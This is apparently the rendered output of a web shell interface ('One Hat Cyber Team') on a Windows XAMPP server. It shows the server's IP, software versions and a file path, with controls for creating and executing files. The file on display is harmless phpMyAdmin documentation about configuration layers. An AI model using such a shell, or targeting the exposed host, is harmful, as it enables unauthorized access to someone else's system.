One Hat Cyber Team
Your IP :
172.16.0.254
Server IP :
58.26.163.33
Server :
Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Server Software :
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
PHP Version :
7.3.25
Buat File
|
Buat Folder
Eksekusi
Dir :
C:
/
xampp7
/
phpMyAdmin
/
doc
/
html
/
_sources
/
View File Name :
settings.rst.txt
Configuring phpMyAdmin ---------------------- There are many configuration settings that can be used to customize the interface. Those settings are described in :ref:`config`. There are several layers of the configuration. The global settings can be configured in :file:`config.inc.php` as described in :ref:`config`. This is only way to configure connections to databases and other system wide settings. On top of this there are user settings which can be persistently stored in :ref:`linked-tables`, possibly automatically configured through :ref:`zeroconf`. If the :ref:`linked-tables` are not configured, the settings are temporarily stored in the session data; these are valid only until you logout. You can also save the user configuration for further use, either download them as a file or to the browser local storage. You can find both those options in the :guilabel:`Settings` tab. The settings stored in browser local storage will be automatically offered for loading upon your login to phpMyAdmin.